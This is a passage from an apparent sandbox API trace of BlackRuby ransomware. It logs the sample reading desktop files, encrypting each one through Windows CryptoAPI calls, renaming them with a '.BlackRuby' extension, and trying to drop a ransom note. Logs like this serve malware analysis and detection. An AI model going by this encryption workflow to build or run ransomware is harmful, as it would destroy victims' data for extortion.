(hObject=0x184) returned 1 [0056.907] GetLastError () returned 0x0 [0056.907] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.907] GetLastError () returned 0x0 [0056.907] SetErrorMode (uMode=0x1) returned 0x0 [0056.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e25d5b0, ftCreationTime.dwHighDateTime=0x1d34b70, ftLastAccessTime.dwLowDateTime=0x8f98abd0, ftLastAccessTime.dwHighDateTime=0x1d351ee, ftLastWriteTime.dwLowDateTime=0x8f98abd0, ftLastWriteTime.dwHighDateTime=0x1d351ee, nFileSizeHigh=0x0, nFileSizeLow=0x5e8d)) returned 1 [0056.907] GetLastError () returned 0x0 [0056.907] SetErrorMode (uMode=0x0) returned 0x1 [0056.907] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c818) returned 1 [0056.908] GetLastError () returned 0x0 [0056.942] CryptImportKey (in: hProv=0x37c818, pbData=0x1ba7c84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b20) returned 1 [0056.942] GetLastError () returned 0x0 [0056.942] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.942] GetLastError () returned 0x0 [0056.947] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ae0) returned 1 [0056.947] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bd4cd0*=0x1, dwFlags=0x0) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bd4c9c, dwFlags=0x0) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd4d18*, pdwDataLen=0x18ec9c*=0x5f80, dwBufLen=0x5f80 | out: pbData=0x1bd4d18*, pdwDataLen=0x18ec9c*=0x5f80) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be0c44*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1be0c44*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1be0c74*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1be0c74*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.947] GetLastError () returned 0x0 [0056.947] CryptDestroyKey (hKey=0x360b20) returned 1 [0056.947] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.947] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0056.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.948] GetLastError () returned 0x0 [0056.948] SetErrorMode (uMode=0x1) returned 0x0 [0056.948] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.948] GetLastError () returned 0xb7 [0056.949] GetFileType (hFile=0x184) returned 0x1 [0056.949] SetErrorMode (uMode=0x0) returned 0x1 [0056.949] GetFileType (hFile=0x184) returned 0x1 [0056.950] CloseHandle (hObject=0x184) returned 1 [0056.950] GetLastError () returned 0xb7 [0056.950] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png", lpFilePart=0x0) returned 0x41 [0056.950] GetLastError () returned 0xb7 [0056.950] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_m8hFMFMBfwIxja670C72DqdZoKCsDQUCAJ8AIz0j3.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_m8hFMFMBfwIxja670C72DqdZoKCsDQUCAJ8AIz0j3.BlackRuby", lpFilePart=0x0) returned 0x6b [0056.950] GetLastError () returned 0xb7 [0056.950] SetErrorMode (uMode=0x1) returned 0x0 [0056.950] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e25d5b0, ftCreationTime.dwHighDateTime=0x1d34b70, ftLastAccessTime.dwLowDateTime=0x8f98abd0, ftLastAccessTime.dwHighDateTime=0x1d351ee, ftLastWriteTime.dwLowDateTime=0x2a238c20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5f90)) returned 1 [0056.950] GetLastError () returned 0xb7 [0056.950] SetErrorMode (uMode=0x0) returned 0x1 [0056.950] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ctNnG5BlxNTLKmq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ctnng5blxntlkmq.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_m8hFMFMBfwIxja670C72DqdZoKCsDQUCAJ8AIz0j3.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_m8hfmfmbfwixja670c72dqdzokcsdqucaj8aiz0j3.blackruby")) returned 1 [0056.950] GetLastError () returned 0xb7 [0056.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0056.951] GetLastError () returned 0xb7 [0056.951] SetErrorMode (uMode=0x1) returned 0x0 [0056.951] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.951] GetLastError () returned 0x5 [0056.951] SetErrorMode (uMode=0x0) returned 0x1 [0056.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", lpFilePart=0x0) returned 0x3f [0056.952] GetLastError () returned 0x5 [0056.952] SetErrorMode (uMode=0x1) returned 0x0 [0056.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\d9xwyeakqt5pr.swf"), fInfoLevelId=0x0, lpFileInformation=0x1c0fef0 | out: lpFileInformation=0x1c0fef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2324490, ftCreationTime.dwHighDateTime=0x1d357ca, ftLastAccessTime.dwLowDateTime=0x9df7cbc0, ftLastAccessTime.dwHighDateTime=0x1d355f4, ftLastWriteTime.dwLowDateTime=0x9df7cbc0, ftLastWriteTime.dwHighDateTime=0x1d355f4, nFileSizeHigh=0x0, nFileSizeLow=0x7e2f)) returned 1 [0056.952] GetLastError () returned 0x5 [0056.952] SetErrorMode (uMode=0x0) returned 0x1 [0056.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", lpFilePart=0x0) returned 0x3f [0056.952] GetLastError () returned 0x5 [0056.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", lpFilePart=0x0) returned 0x3f [0056.952] GetLastError () returned 0x5 [0056.952] SetErrorMode (uMode=0x1) returned 0x0 [0056.952] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\d9xwyeakqt5pr.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.952] GetLastError () returned 0x0 [0056.952] GetFileType (hFile=0x184) returned 0x1 [0056.952] SetErrorMode (uMode=0x0) returned 0x1 [0056.952] GetFileType (hFile=0x184) returned 0x1 [0056.952] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x7e2f [0056.952] GetLastError () returned 0x0 [0056.952] ReadFile (in: hFile=0x184, lpBuffer=0x1c11a00, nNumberOfBytesToRead=0x7e2f, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c11a00*, lpNumberOfBytesRead=0x18ecac*=0x7e2f, lpOverlapped=0x0) returned 1 [0056.953] GetLastError () returned 0x0 [0056.953] CloseHandle (hObject=0x184) returned 1 [0056.953] GetLastError () returned 0x0 [0056.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", lpFilePart=0x0) returned 0x3f [0056.953] GetLastError () returned 0x0 [0056.953] SetErrorMode (uMode=0x1) returned 0x0 [0056.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\d9xwyeakqt5pr.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2324490, ftCreationTime.dwHighDateTime=0x1d357ca, ftLastAccessTime.dwLowDateTime=0x9df7cbc0, ftLastAccessTime.dwHighDateTime=0x1d355f4, ftLastWriteTime.dwLowDateTime=0x9df7cbc0, ftLastWriteTime.dwHighDateTime=0x1d355f4, nFileSizeHigh=0x0, nFileSizeLow=0x7e2f)) returned 1 [0056.953] GetLastError () returned 0x0 [0056.953] SetErrorMode (uMode=0x0) returned 0x1 [0056.964] CryptImportKey (in: hProv=0x37c708, pbData=0x1c7ba3c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ee0) returned 1 [0056.964] GetLastError () returned 0x0 [0056.964] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.964] GetLastError () returned 0x0 [0056.969] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x3609e0) returned 1 [0056.969] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1ca8a88*=0x1, dwFlags=0x0) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1ca8a54, dwFlags=0x0) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca8ad0*, pdwDataLen=0x18ec9c*=0x7f20, dwBufLen=0x7f20 | out: pbData=0x1ca8ad0*, pdwDataLen=0x18ec9c*=0x7f20) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb893c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1cb893c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb896c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1cb896c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.969] GetLastError () returned 0x0 [0056.969] CryptDestroyKey (hKey=0x360ee0) returned 1 [0056.969] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.969] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.969] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf", lpFilePart=0x0) returned 0x3f [0056.969] GetLastError () returned 0x0 [0056.969] SetErrorMode (uMode=0x1) returned 0x0 [0056.970] GetFileType (hFile=0x184) returned 0x1 [0056.970] GetFileType (hFile=0x184) returned 0x1 [0056.972] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\d9XwYeAKqt5pR.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\d9xwyeakqt5pr.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_ZxjSQJw1zZzGBURrISIGkm4B3jKr5ms7Li07.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_zxjsqjw1zzzgburrisigkm4b3jkr5ms7li07.blackruby")) returned 1 [0056.972] GetLastError () returned 0xb7 [0056.973] SetErrorMode (uMode=0x0) returned 0x1 [0056.973] GetFileType (hFile=0x184) returned 0x1 [0056.973] GetFileType (hFile=0x184) returned 0x1 [0056.973] ReadFile (in: hFile=0x184, lpBuffer=0x1cef7ac, nNumberOfBytesToRead=0x14b71, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1cef7ac*, lpNumberOfBytesRead=0x18ecac*=0x14b71, lpOverlapped=0x0) returned 1 [0056.974] GetLastError () returned 0x0 [0057.012] CryptImportKey (in: hProv=0x37c790, pbData=0x1b5ef54, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360c20) returned 1 [0057.012] GetLastError () returned 0x0 [0057.012] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.012] GetLastError () returned 0x0 [0057.017] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.017] GetLastError () returned 0x0 [0057.017] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360d20) returned 1 [0057.017] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.017] GetLastError () returned 0x0 [0057.017] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1b8bfa0*=0x1, dwFlags=0x0) returned 1 [0057.017] GetLastError () returned 0x0 [0057.017] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1b8bf6c, dwFlags=0x0) returned 1 [0057.017] GetLastError () returned 0x0 [0057.017] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b67020*, pdwDataLen=0x18ec9c*=0x14c70, dwBufLen=0x14c70 | out: pbData=0x2b67020*, pdwDataLen=0x18ec9c*=0x14c70) returned 1 [0057.018] GetLastError () returned 0x0 [0057.018] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8bffc*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b8bffc*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.018] GetLastError () returned 0x0 [0057.018] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b8c02c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b8c02c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.018] GetLastError () returned 0x0 [0057.019] CryptDestroyKey (hKey=0x360c20) returned 1 [0057.019] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.019] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf", lpFilePart=0x0) returned 0x40 [0057.019] GetLastError () returned 0x0 [0057.019] SetErrorMode (uMode=0x1) returned 0x0 [0057.019] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\jx2bbv97hqvww1.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.021] GetLastError () returned 0xb7 [0057.021] GetFileType (hFile=0x184) returned 0x1 [0057.021] SetErrorMode (uMode=0x0) returned 0x1 [0057.021] GetFileType (hFile=0x184) returned 0x1 [0057.023] CloseHandle (hObject=0x184) returned 1 [0057.023] GetLastError () returned 0xb7 [0057.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf", lpFilePart=0x0) returned 0x40 [0057.023] GetLastError () returned 0xb7 [0057.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_G00gPUxztMUGVgQaDtUOfUdkKUEHxg6XkJqMEmv7.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_G00gPUxztMUGVgQaDtUOfUdkKUEHxg6XkJqMEmv7.BlackRuby", lpFilePart=0x0) returned 0x6a [0057.023] GetLastError () returned 0xb7 [0057.023] SetErrorMode (uMode=0x1) returned 0x0 [0057.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\jx2bbv97hqvww1.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf0c7f40, ftCreationTime.dwHighDateTime=0x1d34bfe, ftLastAccessTime.dwLowDateTime=0xe1c3a950, ftLastAccessTime.dwHighDateTime=0x1d34b36, ftLastWriteTime.dwLowDateTime=0x2a2f7300, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x14c80)) returned 1 [0057.023] GetLastError () returned 0xb7 [0057.023] SetErrorMode (uMode=0x0) returned 0x1 [0057.023] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\JX2BBv97hqvWw1.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\jx2bbv97hqvww1.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_G00gPUxztMUGVgQaDtUOfUdkKUEHxg6XkJqMEmv7.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_g00gpuxztmugvgqadtuofudkkuehxg6xkjqmemv7.blackruby")) returned 1 [0057.024] GetLastError () returned 0xb7 [0057.024] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0057.024] GetLastError () returned 0xb7 [0057.024] SetErrorMode (uMode=0x1) returned 0x0 [0057.024] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.024] GetLastError () returned 0x5 [0057.025] SetErrorMode (uMode=0x0) returned 0x1 [0057.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.026] GetLastError () returned 0x5 [0057.026] SetErrorMode (uMode=0x1) returned 0x0 [0057.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), fInfoLevelId=0x0, lpFileInformation=0x1ba9400 | out: lpFileInformation=0x1ba9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a474a0, ftCreationTime.dwHighDateTime=0x1d35127, ftLastAccessTime.dwLowDateTime=0xa25c8cd0, ftLastAccessTime.dwHighDateTime=0x1d355f1, ftLastWriteTime.dwLowDateTime=0xa25c8cd0, ftLastWriteTime.dwHighDateTime=0x1d355f1, nFileSizeHigh=0x0, nFileSizeLow=0x167bd)) returned 1 [0057.026] GetLastError () returned 0x5 [0057.026] SetErrorMode (uMode=0x0) returned 0x1 [0057.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.026] GetLastError () returned 0x5 [0057.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.026] GetLastError () returned 0x5 [0057.026] SetErrorMode (uMode=0x1) returned 0x0 [0057.026] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.026] GetLastError () returned 0x0 [0057.026] GetFileType (hFile=0x184) returned 0x1 [0057.026] SetErrorMode (uMode=0x0) returned 0x1 [0057.026] GetFileType (hFile=0x184) returned 0x1 [0057.026] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x167bd [0057.026] GetLastError () returned 0x0 [0057.027] ReadFile (in: hFile=0x184, lpBuffer=0x2bceee0, nNumberOfBytesToRead=0x167bd, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2bceee0*, lpNumberOfBytesRead=0x18ecac*=0x167bd, lpOverlapped=0x0) returned 1 [0057.028] GetLastError () returned 0x0 [0057.028] CloseHandle (hObject=0x184) returned 1 